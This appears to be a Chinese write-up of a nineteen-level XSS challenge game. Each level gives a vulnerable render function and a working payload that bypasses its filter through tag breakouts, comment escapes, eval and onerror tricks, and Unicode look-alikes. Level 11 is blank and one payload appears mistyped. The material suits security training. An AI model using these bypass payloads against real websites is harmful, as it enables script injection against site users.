第一关
1 2 3
| function render (input) { return '<div>' + input + '</div>' }
|
payload=<script>alert(1)</script>
第二关
1 2 3
| function render (input) { return '<textarea>' + input + '</textarea>' }
|
payload=</textarea><script>alert(1)</script>
第三关
1 2 3
| function render (input) { return '<input type="name" value="' + input + '">' }
|
payload="><script>alert(1)</script>
第四关
1 2 3 4 5
| function render (input) { const stripBracketsRe = /[()]/g input = input.replace(stripBracketsRe, '') return input }
|
payload=<script>alert`1`</script>
第五关
1 2 3 4 5
| function render (input) { const stripBracketsRe = /[()`]/g input = input.replace(stripBracketsRe, '') return input }
|
payload=<script>window.onerror=eval;throw'=alert\x281\x29'</script>
第六关
1 2 3 4
| function render (input) { input = input.replace(/-->/g, '😂') return '<!-- ' + input + ' -->' }
|
payload=--!><script>alert(1)</script><!--
第七关
1 2 3 4
| function render (input) { input = input.replace(/auto|on.*=|>/ig, '_') return `<input value=1 ${input} type="text">` }
|
payload=
type="image" src="s" onerror
="alert(1)"
注意换行
第八关
1 2 3 4 5 6
| function render (input) { const stripTagsRe = /<\/?[^>]+>/gi
input = input.replace(stripTagsRe, '') return `<article>${input}</article>` }
|
payload=<body onload="alert(1)"
第九关
1 2 3 4 5 6 7 8
| function render (src) { src = src.replace(/<\/style>/ig, '/* \u574F\u4EBA */') return ` <style> ${src} </style> ` }
|
payload=
</style
><script>alert(1)</script>
第十关
1 2 3 4 5 6 7
| function render (input) { let domainRe = /^https?:\/\/www\.segmentfault\.com/ if (domainRe.test(input)) { return `<script src="${input}"></script>` } return 'Invalid URL' }
|
payload=https://www.segmentfault.com" onload="alert(1)
第十一关
第十二关
1 2 3 4
| function render (input) { input = input.toUpperCase() return `<h1>${input}</h1>` }
|
payload=<img src=1 onerror=alert(1)>
第十三关
1 2 3 4 5
| function render (input) { input = input.replace(/script/ig, '') input = input.toUpperCase() return '<h1>' + input + '</h1>' }
|
同上
payload=<img src=1 onerror=alert(1)>
第十四关
1 2 3 4 5 6 7 8
| function render (input) { input = input.replace(/[</"']/g, '') return ` <script> // alert('${input}') </script> ` }
|
payload=
alert(1)
-->
第十五关
1 2 3 4 5
| function render (input) { input = input.replace(/<([a-zA-Z])/g, '<_$1') input = input.toUpperCase() return '<h1>' + input + '</h1>' }
|
payload=<ſcript src="https://www.baidu.com" onload=alert(1)></script>
第十六关
1 2 3 4 5 6 7 8 9 10 11
| function render (input) { function escapeHtml(s) { return s.replace(/&/g, '&') .replace(/'/g, ''') .replace(/"/g, '"') .replace(/</g, '<') .replace(/>/g, '>') .replace(/\//g, '/') } return `<img src onerror="console.error('${escapeHtml(input)}')">` }
|
payload=');alert('1
第十七关
1 2 3 4 5 6 7
| function render (input) { return ` <script> window.data = ${input} </script> ` }
|
payload=alet(1)
第十八关
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30
| function render (s) { function escapeJs (s) { return String(s) .replace(/\\/g, '\\\\') .replace(/'/g, '\\\'') .replace(/"/g, '\\"') .replace(/`/g, '\\`') .replace(/</g, '\\74') .replace(/>/g, '\\76') .replace(/\//g, '\\/') .replace(/\n/g, '\\n') .replace(/\r/g, '\\r') .replace(/\t/g, '\\t') .replace(/\f/g, '\\f') .replace(/\v/g, '\\v') .replace(/\0/g, '\\0') } s = escapeJs(s) return ` <script> var url = 'javascript:console.log("${s}")' var a = document.createElement('a') a.href = url document.body.appendChild(a) a.click() </script> ` }
|
payload=");alert(1)//
第十九关
1 2 3 4 5
| function escape (s) { s = s.replace(/"/g, '\\"') return '<script>console.log("' + s + '");</script>' }
|
payload=
</script><script>
alert(1)
-->